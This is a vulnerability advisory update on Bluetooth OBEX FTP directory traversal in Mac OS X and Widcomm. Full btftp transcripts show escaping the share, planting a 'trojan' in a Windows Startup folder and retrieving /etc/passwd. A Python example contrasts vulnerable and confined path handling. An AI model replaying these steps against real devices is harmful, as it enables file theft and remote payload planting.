Bluetooth dot dot attacks (update)
In DMA[2005-0502a] I stated that "...I cannot confirm nor deny that files can be placed or retrieved via OBEX FTP and the ../../ method. I have only been able to list files using my current obex client (against Mac OSX)."
With a modified version of btftp from Affix-3.2.0 I am now able to confirm that an attacker also has the ability to both grab and put files outside of the default drop path when using OBEX FTP. Zero authentication is required on OSX if an unpatched machine is being used.
I can also now state that Widcomm software on PDAs is also affected. This is NOT the same as my object push ../ vulnerability. This Widcomm bug is yet another bug that has not been disclosed in the past. Some PDAs require authentication for OBEX FTP; some do not.
Here is an example attack against my HP iPAQ 2215:
animosity:/usr/src/affix-3.2.0# btftp
Affix version: Affix 3.2.0
Welcome to btftp (OBEX) tool. Type ? for help.
Mode: Bluetooth
ftp> open 00:04:3e:65:a1:c8
Service found on channel: 3
Connected.
ftp> ls
-rwdx 634 eyiot447.pwi
drwdx 0 Business
drwdx 0 Personal
drwdx 0 Templates
Command complete.
ftp> cd ../
Command complete.
ftp> ls
drwdx 0 ..
Command complete.
ftp> cd Windows
Command complete.
ftp> cd Startup
Command complete.
ftp> put /etc/hosts trojan
Transfer started...
Transfer complete.
257 bytes sent in 0.5 secs (5140.00 B/s)
ftp> ls trojan
Browsing error: OBEX error: Internal server error (0x50)
ftp>
If I go to the iPAQ and browse the folder in question, the file is sitting right where I placed it.
Here is an example attack against my Apple OSX machine; this shows me grabbing /etc/passwd:
animosity:/usr/src/affix-3.2.0# btftp
Affix version: Affix 3.2.0
Welcome to btftp (OBEX) tool. Type ? for help.
Mode: Bluetooth
ftp> open 00:11:95:4f:60:1f
Service found on channel: 15
Connected.
ftp> ls
d---- 0 Faxes
d---- 0 New Folder
d---- 0 SC Info
Command complete.
ftp> cd ../
Command complete.
ftp> ls
d---- 0 ..
----- 195662 4D WebSTAR Installer.log
d---- 0 johnh
d---- 0 kevinfinisterre
d---- 0 Shared
d---- 0 webstar
Command complete.
ftp> cd ../
Command complete.
ftp> ls
d---- 0 ..
d---- 0 Applications
d---- 0 automount
d---- 0 bin
d---- 0 cores
----- 3584 Desktop DB
----- 4482 Desktop DF
d---- 0 dev
d---- 0 Developer
----- 11 etc
d---- 0 File Transfer Folder
d---- 0 Library
----- 9 mach
----- 571184 mach.sym
----- 3872560 mach_kernel
d---- 0 Network
d---- 0 private
d---- 0 sbin
d---- 0 System
----- 11 tmp
d---- 0 Users
d---- 0 usr
----- 11 var
d---- 0 Volumes
Command complete.
ftp> cd etc
Command complete.
ftp> ls
d---- 0 ..
----- 753 6to4.conf
----- 515 afpovertcp.cfg
----- 15 aliases
----- 16384 aliases.db
----- 1046 amd.conf.template
----- 112 amd.map.template
d---- 0 auth
----- 14761 authorization
----- 16541 authorization.cac
----- 160 bashrc
d---- 0 charset
----- 295 crontab
----- 189 csh.cshrc
----- 83 csh.login
----- 39 csh.logout
d---- 0 cups
----- 24 daily
d---- 0 defaults
----- 0 dumpdates
----- 695 efax.rc
----- 0 find.codes
d---- 0 fonts
----- 293 fstab
----- 150 fstab.hd
----- 119 ftpusers
----- 576 gdb.conf
----- 5678 gettytab
----- 699 group
----- 491 hostconfig
----- 492 hostconfig~
----- 0 hosts.equiv
----- 0 hosts.lpd
d---- 0 httpd
d---- 0 idmap
----- 2893 inetd.conf
----- 12 kcpassword
----- 0 kern_loader.conf
----- 30 localtime
----- 131072 lowcase.dat
d---- 0 mach_init.d
d---- 0 mach_init_per_user.d
----- 105 mail.rc
----- 891 manpath.config
----- 1259 master.passwd
----- 88039 moduli
----- 28 monthly
----- 19 motd
----- 905 named.conf
----- 53 networks
----- 132 notify.conf
----- 44 ntp.conf
d---- 0 openldap
d---- 0 pam.d
----- 1374 passwd
d---- 0 pdb
d---- 0 periodic
----- 38693 php.ini.default
d---- 0 postfix
d---- 0 ppp
----- 125 profile
----- 5766 protocols
d---- 0 racoon
----- 8099 rc
----- 3572 rc.boot
----- 4178 rc.cleanup
----- 2356 rc.common
----- 4763 rc.netboot
----- 20 resolv.conf
d---- 0 resolver
----- 13 rmt
----- 0 rmtab
----- 971 rpc
----- 983 rtadvd.conf
----- 572576 services
----- 170 shells
----- 52 slpsa.conf
----- 1732 smb.conf
----- 1144 ssh_config
----- 668 ssh_host_dsa_key
----- 590 ssh_host_dsa_key.pub
----- 515 ssh_host_key
----- 319 ssh_host_key.pub
----- 883 ssh_host_rsa_key
----- 210 ssh_host_rsa_key.pub
----- 2409 sshd_config
----- 361 sudoers
----- 798 syslog.conf
----- 2442 ttys
----- 131072 upcase.dat
----- 65536 valid.dat
d---- 0 vfs
----- 26 weekly
----- 238 xinetd.conf
d---- 0 xinetd.d
----- 0 xtab
Command complete.
ftp> get passwd
Transfer started...
Transfer complete.
268564544 bytes received in 0.34 secs (789895717.65 B/s)
animosity:/usr/local/bin# cat passwd
##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode. At other times this information is handled by one or more of:
# lookupd DirectoryServices
# By default, lookupd gets information from NetInfo, so this file will
# not be consulted unless you have changed lookupd's configuration.
# This file is used while in single user mode.
#
# To use this file for normal authentication, you may enable it with
# /Applications/Utilities/Directory Access.
##
nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/false
lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false
postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin/false
www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false
cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false
mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false
appserver:*:79:79:Application Server:/var/empty:/usr/bin/false
unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
This shows me placing a file in /tmp:
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
d---- 0 Faxes
d---- 0 New Folder
d---- 0 SC Info
Command complete.
ftp> cd ../
Command complete.
ftp> cd ../
Command complete.
ftp> cd tmp
Command complete.
ftp> ls
d---- 0 ..
Command complete.
ftp> put /etc/hosts hosts
Transfer started...
Transfer complete.
257 bytes sent in 0.10 secs (2570.00 B/s)
ftp> ls
d---- 0 ..
d---- 0 501
----- 257 hosts
Command complete.
Keep in mind that you are using the permissions of the currently logged in user, so you may not have access to everything.
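The root cause in every transcript above is the same: the server resolves the client's "cd ../" relative to the current folder and never checks that the result is still inside the shared folder. The following is an added example (not code from the advisory, Affix, Apple or Widcomm) that models that SetPath handling in Python: a naive handler that reproduces the escape, and a confined handler that refuses any folder whose normalised path is not the share root or a descendant of it. SHARE_ROOT, the folder names and the function names are assumptions chosen so that the transcript's "../", "../", "tmp" sequence lands in /tmp; the real OBEX wire format (Name header versus backup flag) is not modelled.

```python
import posixpath

# Constructed example root for the OBEX FTP share; the advisory does not say
# which directory the OS X service actually exposes. It is two levels deep so
# that the transcript's "cd ../", "cd ../", "cd tmp" sequence ends in /tmp.
SHARE_ROOT = "/Users/alice"


def naive_setpath(cwd, name):
    """Vulnerable SetPath handling: the client-supplied folder name is joined
    onto the current folder and '..' components are resolved without checking
    that the result is still inside SHARE_ROOT. This reproduces the behaviour
    the transcripts show (cd ../ walks out of the share)."""
    return posixpath.normpath(posixpath.join(cwd, name))


def confined_setpath(cwd, name):
    """Hardened SetPath handling: resolve the requested folder the same way,
    then refuse it unless the normalised result is SHARE_ROOT itself or a
    descendant of it. Absolute names (posixpath.join discards cwd for them)
    and '..' sequences that climb above the root are both rejected here."""
    candidate = posixpath.normpath(posixpath.join(cwd, name))
    root = posixpath.normpath(SHARE_ROOT)
    if candidate != root and not candidate.startswith(root + "/"):
        raise PermissionError(f"SetPath refused: {name!r} leaves {root}")
    return candidate


def replay(handler, names, start=SHARE_ROOT):
    """Replay a sequence of 'cd <name>' requests through a SetPath handler.
    Returns the final folder, or None if the handler refused any step."""
    cwd = start
    for name in names:
        try:
            cwd = handler(cwd, name)
        except PermissionError:
            return None
    return cwd


if __name__ == "__main__":
    escape = ["../", "../", "tmp"]  # the sequence from the OS X transcript
    print("naive   :", replay(naive_setpath, escape))     # /tmp
    print("confined:", replay(confined_setpath, escape))  # None (refused)
    # Descending and coming back up to the root is still allowed.
    print("confined:", replay(confined_setpath, ["Personal", ".."]))  # /Users/alice
```

The check is done on the normalised path rather than by scanning the name for "..": a name such as "Business/../Personal" is legitimate and is accepted, while "../" from the root, or an absolute name, is refused before any filesystem access happens. Note that this confinement is independent of the file permissions of the account running the OBEX service; those only limit what is reachable once the traversal has already succeeded.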
It seems pretty trivial to turn these issues into a worm or some other form of automated attack.
Please apply your Apple updates and turn off that Widcomm stuff if you aren't using it! Do NOT accept requests from unknown Bluetooth sources.
enjoy.
-KF